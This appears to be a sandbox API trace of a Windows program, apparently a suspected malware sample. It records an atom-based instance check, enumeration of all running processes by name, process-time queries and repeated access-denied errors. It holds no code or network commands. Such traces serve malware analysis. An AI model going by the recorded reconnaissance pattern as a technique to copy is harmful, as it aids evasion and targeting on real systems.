	[0137.833] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.833] CloseHandle (hObject=0x2dc) returned 1
	[0137.833] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.833] CloseHandle (hObject=0x2dc) returned 1
	[0137.833] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.833] CloseHandle (hObject=0x2dc) returned 1
	[0137.833] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.833] CloseHandle (hObject=0x2dc) returned 1
	[0137.834] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0137.834] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0137.834] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0137.834] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0137.835] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0137.835] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0137.835] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0137.835] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0137.835] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0137.835] CloseHandle (hObject=0x2dc) returned 1
	[0137.835] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0137.835] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.836] CloseHandle (hObject=0x2dc) returned 1
	[0137.836] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.836] CloseHandle (hObject=0x2dc) returned 1
	[0137.836] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.836] CloseHandle (hObject=0x2dc) returned 1
	[0137.836] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.842] CloseHandle (hObject=0x2dc) returned 1
	[0137.842] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.843] CloseHandle (hObject=0x2dc) returned 1
	[0140.028] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x286ff10 | out: SystemInformation=0x0, ResultLength=0x286ff10*=0x16c38) returned 0xc0000004
	[0140.034] VirtualAlloc (lpAddress=0x0, dwSize=0x16d38, flAllocationType=0x3000, flProtect=0x4) returned 0x3c30000
	[0140.035] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3c30000, Length=0x16d38, ResultLength=0x0 | out: SystemInformation=0x3c30000, ResultLength=0x0) returned 0x0
	[0140.039] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0140.039] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x39b5bb0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0140.040] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b5c10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0140.040] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0140.040] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b5b08, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0140.040] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x39b5970, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0140.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x39b5c10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0140.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x39b5b98, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0140.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0140.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0140.042] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x69d5d8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0140.042] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0140.042] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0140.042] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0140.043] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0140.043] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0140.043] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0140.044] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0140.044] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0140.044] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.044] CloseHandle (hObject=0x2dc) returned 1
	[0140.044] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x39b5b98, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0140.045] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0140.045] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0140.045] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.045] CloseHandle (hObject=0x2dc) returned 1
	[0140.045] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x399d188, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0140.046] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0140.047] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.047] CloseHandle (hObject=0x2dc) returned 1
	[0140.047] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x39b5b98, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0140.048] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.048] CloseHandle (hObject=0x2dc) returned 1
	[0140.048] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0140.048] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.048] CloseHandle (hObject=0x2dc) returned 1
	[0140.048] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0140.048] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.049] CloseHandle (hObject=0x2dc) returned 1
	[0140.049] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x399d128, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0140.050] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.050] CloseHandle (hObject=0x2dc) returned 1
	[0140.050] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0140.050] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.050] CloseHandle (hObject=0x2dc) returned 1
	[0140.051] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0140.051] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0140.051] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.051] CloseHandle (hObject=0x2dc) returned 1
	[0140.051] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0140.051] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.051] CloseHandle (hObject=0x2dc) returned 1
	[0140.052] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0140.052] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.052] CloseHandle (hObject=0x2dc) returned 1
	[0140.052] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x399d188, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0140.052] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.052] CloseHandle (hObject=0x2dc) returned 1
	[0140.053] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x69d578, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0140.053] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.053] CloseHandle (hObject=0x2dc) returned 1
	[0140.053] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x399d128, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0140.053] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.053] CloseHandle (hObject=0x2dc) returned 1
	[0140.053] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x39b9708, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0140.054] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.054] CloseHandle (hObject=0x2dc) returned 1
	[0140.054] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x399d188, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0140.054] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.054] CloseHandle (hObject=0x2dc) returned 1
	[0140.054] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x39b5b80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0140.055] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.055] CloseHandle (hObject=0x2dc) returned 1
	[0140.055] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0140.055] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.055] CloseHandle (hObject=0x2dc) returned 1
	[0140.055] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0140.056] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.056] CloseHandle (hObject=0x2dc) returned 1
	[0140.056] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x399d128, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0140.056] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.056] CloseHandle (hObject=0x2dc) returned 1
	[0140.056] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x39b5b80, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0140.057] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.057] CloseHandle (hObject=0x2dc) returned 1
	[0140.057] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x39b5b80, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0140.057] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.057] CloseHandle (hObject=0x2dc) returned 1
	[0140.058] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x39b9938, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0140.058] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.058] CloseHandle (hObject=0x2dc) returned 1
	[0140.058] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x39b5b50, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0140.058] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.058] CloseHandle (hObject=0x2dc) returned 1
	[0140.058] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x39b5a78, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0140.059] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.059] CloseHandle (hObject=0x2dc) returned 1
	[0140.059] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0140.059] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.059] CloseHandle (hObject=0x2dc) returned 1
	[0140.059] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x39b5b08, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0140.059] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.060] CloseHandle (hObject=0x2dc) returned 1
	[0140.060] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x399d128, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0140.060] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.060] CloseHandle (hObject=0x2dc) returned 1
	[0140.060] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x39b97a8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0140.061] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.061] CloseHandle (hObject=0x2dc) returned 1
	[0140.061] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x39b9af0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0140.061] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.061] CloseHandle (hObject=0x2dc) returned 1
	[0140.061] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x39b5a48, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0140.062] GetLastError () returned 0x5
	[0140.062] GetLastError () returned 0x5
	[0140.062] GetLastError () returned 0x5
	[0140.062] GetLastError () returned 0x5
	[0140.062] GetLastError () returned 0x5
	[0140.062] GetLastError () returned 0x5
	[0140.062] GetLastError () returned 0x5
	[0140.062] GetLastError () returned 0x5
	[0140.062] GetLastError () returned 0x5
	[0140.062] GetLastError () returned 0x5
	[0140.062] GetLastError () returned 0x5
	[0140.062] GetLastError () returned 0x5
	[0140.062] GetLastError () returned 0x5
	[0140.062] GetLastError () returned 0x5
	[0140.062] GetLastError () returned 0x5
	[0140.062] GetLastError () returned 0x5
	[0140.062] GetLastError () returned 0x5
	[0140.062] GetLastError () returned 0x5
	[0140.062] GetLastError () returned 0x5
	[0140.062] GetLastError () returned 0x5
	[0140.062] GetLastError () returned 0x5
	[0140.062] GetLastError () returned 0x5
	[0140.062] GetLastError () returned 0x5
	[0140.062] GetLastError () returned 0x5
	[0140.062] GetLastError () returned 0x5
	[0140.062] GetLastError () returned 0x5
	[0140.062] GetLastError () returned 0x5
	[0140.062] GetLastError () returned 0x5
	[0140.062] GetLastError () returned 0x5
	[0140.062] GetLastError () returned 0x5
	[0140.062] GetLastError () returned 0x5
	[0140.062] GetLastError () returned 0x5
	[0140.062] GetLastError () returned 0x5
	[0140.062] GetLastError () returned 0x5
	[0140.062] GetLastError () returned 0x5
	[0140.062] GetLastError () returned 0x5
	[0140.062] GetLastError () returned 0x5
	[0140.062] GetLastError () returned 0x5
	[0140.062] GetLastError () returned 0x5
	[0140.062] GetLastError () returned 0x5
	[0140.062] GetLastError () returned 0x5
	[0140.062] GetLastError () returned 0x5
	[0140.062] GetLastError () returned 0x5
	[0140.062] GetLastError () returned 0x5
	[0140.062] GetLastError () returned 0x5
	[0140.062] GetLastError () returned 0x5
	[0140.062] GetLastError () returned 0x5
	[0140.063] GetLastError () returned 0x5
	[0140.063] GetLastError () returned 0x5
	[0140.063] GetLastError () returned 0x5
	[0140.063] GetLastError () returned 0x5
	[0140.063] GetLastError () returned 0x5
	[0140.063] GetLastError () returned 0x5
	[0140.063] GetLastError () returned 0x5
	[0140.063] GetLastError () returned 0x5
	[0140.063] GetLastError () returned 0x5
	[0140.063] GetLastError () returned 0x5
	[0140.063] GetLastError () returned 0x5
	[0140.063] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0140.063] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0140.063] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0140.064] GetLastError () returned 0x5
	[0140.064] GetLastError () returned 0x5
	[0140.064] GetLastError () returned 0x5
	[0140.064] GetLastError () returned 0x5
	[0140.064] GetLastError () returned 0x5
	[0140.064] GetLastError () returned 0x5
	[0140.064] GetLastError () returned 0x5
	[0140.064] GetLastError () returned 0x5
	[0140.064] GetLastError () returned 0x5
	[0140.064] GetLastError () returned 0x5
	[0140.064] GetLastError () returned 0x5
	[0140.064] GetLastError () returned 0x5
	[0140.064] GetLastError () returned 0x5
	[0140.064] GetLastError () returned 0x5
	[0140.064] GetLastError () returned 0x5
	[0140.064] GetLastError () returned 0x5
	[0140.064] GetLastError () returned 0x5
	[0140.064] GetLastError () returned 0x5
	[0140.064] GetLastError () returned 0x5
	[0140.064] GetLastError () returned 0x5
	[0140.064] GetLastError () returned 0x5
	[0140.064] GetLastError () returned 0x5
